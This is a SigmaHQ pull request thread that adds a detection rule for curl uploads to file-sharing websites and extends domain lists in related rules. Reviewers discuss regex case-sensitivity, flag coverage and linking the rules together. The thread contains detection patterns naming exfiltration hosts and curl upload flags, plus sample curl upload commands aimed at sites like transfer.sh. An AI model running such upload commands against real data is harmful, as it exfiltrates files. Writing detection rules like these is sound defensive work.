update: suspicious file activity related to file sharing websites #5574
swachchhanda000 wants to merge 5 commits into SigmaHQ:master from
Conversation
| - '0x0.st' | ||
| - 'bashupload.com' | ||
| - 'chunk.io' | ||
| - 'file.io' | ||
| - 'filebin.net' | ||
| - 'pastebin' | ||
| - 'send.firefox.com' | ||
| - 'temp.sh' | ||
| - 'transfer.sh' | ||
| - 'ufile.io' | ||
| - 'uploadfiles.io' | ||
| - 'wetransfer.com' | ||
| - 'x0.at' |
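Review bot: 'pastebin' is the only entry in this list without a TLD, so if the list sits under a `contains` modifier it matches any string containing that word, which is much broader than the fully qualified hosts around it ('file.io', 'transfer.sh', 'x0.at'). Either narrow it to the intended hostname(s) or add a comment stating that the broad match is deliberate.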
You literally just updated other lists that are bigger. Please add them.
Well, I only added the domains that have documentation confirming curl support. Some domains are just for downloads, like cdn.discordapp.com. But I’ll check again to see if I missed any domains.
And btw, some of the pre-existing domains in these rules are dead/not reachable, like anonfiles.com. Should I remove them as well?
Depends on their actual use, I would say. If you still find samples on VT still communicating with them, we keep them in the proc creation related rules, since it would highly mean they are bad.
rules/windows/process_creation/proc_creation_win_curl_upload_file_sharing_websites.yml
a6254cb to b9a91bb
nasbench left a comment
Double check my comment before merging
60eb862 to cf2766d
| - ' -X POST' | ||
| - ' --request POST ' | ||
| - CommandLine|re: | ||
| - '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection |
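Review bot: the regex `\s-[FTd]\s` requires whitespace on both sides of the short flag, so the long-form spellings `--form`, `--upload-file` and `--data` are not matched by this line. Confirm they are covered by the `contains` list above it, or add them, so that the case-sensitive regex does not become the only path to a match for the short flags.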
We have the cased modifier for it, but not sure many backends support it by now 🐈⬛
We should start using it imo. This should be handled by the backend/pySigma.
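To illustrate the case-sensitivity point discussed in this thread, here is an added Python example (not from the PR or the Sigma project) that runs three matching styles over constructed curl command lines: Sigma's default case-insensitive `contains`, an emulation of `contains|cased`, and the hunk's regex. The sample lines are constructed; `-f` (--fail) and `-D` (--dump-header) are used because they are the opposite-case siblings of the upload flags `-F` and `-d`.

```python
import re

# Constructed sample command lines (not from the PR) exercising the
# curl upload pattern the rule targets: -F/-T/-d plus -X POST/--request POST,
# alongside benign commands that only differ in flag case.
SAMPLES = {
    "form_upload":   'curl.exe -F "file=@C:\\Users\\u\\archive.zip" https://file.io',
    "put_upload":    'curl -T C:\\Users\\u\\dump.bin https://transfer.sh/dump.bin',
    "post_data":     'curl -X POST -d @notes.txt https://0x0.st',
    "fail_download": 'curl -f -o out.bin https://example.invalid/tool.exe',  # -f = --fail
    "dump_headers":  'curl -D headers.txt https://example.invalid/',         # -D = --dump-header
    "plain_get":     'curl https://example.invalid/index.html',
}

SHORT_FLAGS = (" -F ", " -T ", " -d ")
UPLOAD_FLAG_RE = re.compile(r"\s-[FTd]\s")   # case-sensitive, as in the PR hunk


def contains_default(cmd: str) -> bool:
    """Sigma's default |contains behaviour: case-insensitive substring match."""
    lower = cmd.lower()
    return any(tok.lower() in lower for tok in SHORT_FLAGS)


def contains_cased(cmd: str) -> bool:
    """Emulates |contains|cased: exact-case substring match."""
    return any(tok in cmd for tok in SHORT_FLAGS)


def matches_regex(cmd: str) -> bool:
    """The hunk's |re approach: Python/PCRE regexes are case-sensitive by default."""
    return UPLOAD_FLAG_RE.search(cmd) is not None


def compare(samples=SAMPLES):
    """Return {name: (default_contains, cased_contains, regex)} for each sample."""
    return {name: (contains_default(c), contains_cased(c), matches_regex(c))
            for name, c in samples.items()}


if __name__ == "__main__":
    for name, hits in compare().items():
        print(f"{name:14s} default={hits[0]!s:5s} cased={hits[1]!s:5s} regex={hits[2]}")
```

The benign `-f` and `-D` commands trip only the case-insensitive matcher, which is the false-positive class the regex (or the `cased` modifier, where the backend supports it) avoids.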
cf2766d to 711af16
| @@ -21,8 +21,11 @@ detection: | |||
| EventID: 854 | |||
| Path|contains: | |||
| - '.githubusercontent.com' # Includes both gists and github repositories / Michael Haag (idea) | |||
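Review bot: this `Path|contains` list is one of several copies of the same file-sharing domain list extended across this changeset, so the rule should carry a `related` entry with `type: similar` pointing at the sibling rules (for example proc_creation_win_curl_upload_file_sharing_websites.yml) so that the lists are maintained together. Also note that '.githubusercontent.com' keeps a leading dot while the other lists in this PR use bare hostnames such as 'file.io'; pick one convention per list or explain the difference in the trailing comment.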
All lists (such as here) that are the same and that should be maintained together should be linked in the metadata as "similar".
All the rules should add a related similar to at least one rule.
frack113 left a comment
Need to link the rules with like proc_creation_win_curl_upload_file_sharing_websites.yml
Summary of the Pull Request
Changelog
new - Curl File Upload To File Sharing Websites
update - Suspicious Remote AppX Package Locations - add more file sharing domains
update - BITS Transfer Job Download From File Sharing Domains - add more file sharing domains
update - Suspicious File Download From File Sharing Websites - File Stream - add more file sharing domains
update - Unusual File Download From File Sharing Websites - File Stream - add more file sharing domains
update - New Connection Initiated To Potential Dead Drop Resolver Domain - add more file sharing domains
update - Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder - add more file sharing domains
update - Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location - add more file sharing domains
update - Suspicious Download From File-Sharing Website Via Bitsadmin - add more file sharing domains
update - Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE - add more file sharing domains
update - Suspicious File Download From File Sharing Domain Via Curl.EXE - add more file sharing domains
update - Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE - add more file sharing domains
update - Suspicious File Download From File Sharing Domain Via Wget.EXE - add more file sharing domains
Example Log Event
Fixed Issues
SigmaHQ Rule Creation Conventions